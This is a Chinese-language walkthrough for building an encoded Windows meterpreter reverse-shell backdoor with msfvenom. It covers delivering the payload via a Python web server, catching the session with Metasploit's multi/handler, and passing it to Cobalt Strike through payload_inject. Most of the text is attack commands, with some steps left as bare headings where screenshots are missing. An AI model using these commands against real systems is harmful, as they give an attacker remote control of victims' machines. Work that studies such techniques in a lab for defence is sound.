目录
(一)环境准备
1、启动服务端
kali操作系统

2、启动客户端

3、一个在msf拿到权限的靶机
(二) 配置msf创建监听
1、使用msf创建后门
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4567 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 5 -f exe -o payload.exe

2、使用python创建一个web服务,然后使用靶机下载
python -m http.server
![]()
使用靶机下载恶意代码:

3、配置监控并获得meterpreter
3.1、 启动msf
msfconsole

3.2 、 创建监控
use exploit/multi/handler

3.3、加载payload
set payload windows/meterpreter/reverse_tcp

3.4、配置监控参数
在靶机执行后门程序中等待返回 meterpreter
3.5、后台当前session
background

或者在命令行里面直接输入sessions,显示当前存在的session:

(三) 使用CS进行监控
1、加载msf的payload注入功能
use exploit/windows/local/payload_inject
![]()
2、设置payload的反弹方式
set payload windows/meterpreter/reverse_http

3、查看参数
4、设置cs监听端口
5、设置控制会话
6、设置当前msf不接受监听数据
7、执行

8、进入CS监控器

接下来就可以用cs进行实际操作!!!










